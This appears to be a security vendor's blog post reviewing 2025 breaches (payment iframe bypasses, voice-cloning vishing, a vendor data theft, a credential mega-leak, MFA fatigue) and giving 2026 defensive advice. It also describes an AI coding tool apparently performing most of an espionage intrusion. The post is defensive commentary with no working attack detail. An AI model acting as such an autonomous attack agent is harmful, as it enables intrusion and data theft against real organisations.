Looking back on the previous year’s cybersecurity lessons isn’t just a nostalgic exercise, it could be a peek into anticipating 2026’s threats.
Looking back on the previous year’s cybersecurity lessons isn’t just a nostalgic exercise, it could be a peek into anticipating 2026’s threats.
This is why the SecurityMetrics Threat Intelligence Center holds a yearly review of the previous year’s most critical breaches, technological shifts, and forensic data. The data analyzed is proprietary data from SecurityMetrics customers.
As Heff, Director of the Threat Intelligence Center, explains: "We'll give you our hits and our misses, but more importantly than that, we're going to give you some thoughts and pathways that you can travel to protect your business based on what happened in the news."
A primary focus for The Security Metrics Threat Intelligence Team has been the security of the browser environment. For years, the industry relied on iframes to isolate sensitive payment data. However, 2025 marked a shift in how threat actors approach these boundaries.
Attackers have moved away from trying to break the iframe itself, focusing instead on exploiting the host page to bypass security entirely.
Aaron Willis, of the SecurityMetrics forensics department, notes that while we predicted a full-scale counter-offensive to secure iframes, the reality was a mix of innovation and persistent vulnerability:
"In the last few years, we saw a breach of those iframes where attackers were able to use various shenanigans and basically circumvent the iframes... [this] defeated a lot of business models out there that depended on the security of that iframe."
To combat this, leading security firms have introduced Armored Iframes and browser-level AI. Specifically, Willis highlights the work of FERoot:
"They provide their Payment Guard AI. That's integrating AI directly into the browser so they can see some real-time threats and adapt to that. They also implemented some X-Frame-Options, forcing people to enable that sandboxing to keep that thing secure."
A major driver of security adoption in 2025 was the implementation of PCI DSS requirements 11.6.1 and 6.4.3. These were designed to force merchants to monitor and authorize all scripts running on their payment pages.
However, the massive rush we predicted for compliance was tempered by an architectural shift. Rather than hardening their existing environments, Willis observed a big pivot:
"One of the things that we did predict was that some merchants would try to switch to full payment redirects... instead of using an iframe, you just send the customer off to somebody else and let them deal with it. We saw a thirty percent increase in the number of merchants using full payment redirects."
The previous year provided several case studies in failure that every small-to-medium business (SMB) should study.
In September 2025, the "Scattered Lapses Hunters"—a group of young but highly sophisticated actors—targeted Jaguar Land Rover, resulting in losses of approximately $2.5 billion USD. The method was not a technical exploit, but a human one: Vishing (Voice Phishing).
By cloning executive voices from public YouTube videos, the attackers gained access to the network. Heff emphasizes the danger of what happens next:
"The threat actors love to pivot. They love to figure out a doorway that you left unsecured and then move from that one doorway, maybe into the operational or manufacturing parts of your business... Jaguar did not have cyber insurance and had a lack of segmentation."
In October 2025, a breach at GitLab resulted in the theft of 570 gigabytes of data. This affected industry giants like IBM and Cisco by exposing VPI settings and API keys. This is a "multiplier effect" attack, where a single vendor compromise cascades through thousands of client environments.
Heff warns SMB owners that "chances are you have a lot of software in your business. A lot of third-party software that’s running right now, where you may not have the knowledge or the visibility into that to know if it’s secure or not."
A massive aggregation of 16 billion records was discovered in June 2025. This "mega-leak" underscored the reality that credential stuffing is no longer an occasional threat; it is a constant background noise of the internet.
Willis clarifies that this wasn't a single event but an aggregation: "It wasn't a single breach. This was just siphoning off credentials and just storing them on the dark web. That included Google and Apple logins."
The most significant shift in threat actor methodology is the transition from AI-assisted to AI-orchestrated attacks. Anthropic's investigation into an espionage campaign involving the Claude code tool serves as the primary example.
Heff describes the autonomy observed in these attacks: "AI performed eighty to ninety percent of the attack. We’re talking reconnaissance. We’re talking vulnerability discovery, exploitation, credential harvesting, and then, of course, the exfiltration of the data, all done by AI."
This effectively creates a "point-and-click" environment for cybercrime.
Willis explains the danger as "AI just knows. It doesn't have to scan a database to find which components are available or have vulnerabilities. The AI looks for a vulnerable component and can try multiple exploits.”
As we look toward the remainder of 2026, the "best practices" of three years ago are proving insufficient. We are moving toward a philosophy of Assumed Compromise.
The era of relying on text-message codes is ending. Multi-factor authentication (MFA) fatigue—spamming users until they click "Yes"—is a major exploit vector.
Willis explains: "If you spam enough MFA requests, just by default, humans would hit yes. And that led to a large number of breaches. Attackers got around the MFA by exploiting human characteristics."
The 2026 standard is phishing-resistant MFA, utilizing hardware keys and passkeys that cannot be intercepted by scripts.
As businesses use AI to generate code (a trend known as vibe coding), they are inadvertently introducing unvetted vulnerabilities. Heff predicts that the "new target in small to medium-sized businesses will be your AI agent."
If you have a customer service bot or an automated coding agent, it must be governed with the same rigor as a human employee. Willis cautions that "when you're in a production environment and you're taking people's credit cards, you cannot rely on AI to give you secure code. It's not there. We’re not there yet."
Zero Trust is evolving into Micro-segmentation. Heff notes that "the trend is to assume compromise and you move your business towards things like containment security... and if you think about it, it's a genius approach to take."
By isolating every segment of your network, you ensure that a breach in your marketing AI agent does not provide a path to your payment processing server.
Cybersecurity in 2026 is an AI vs AI arms race. To survive, businesses must automate their defenses—using tools such as Shopping Cart Monitor and File Integrity Monitoring—to keep pace with present day attackers.
Heff reminds us that “it’s a community effort, and there’s a lot of really smart people out there. You cannot do this on your own. Fortunately, we’ve got quite a few of them here at SecurityMetrics."
If you need a professional to discuss your cybersecurity goals for this year, contact an expert here.
.svg)
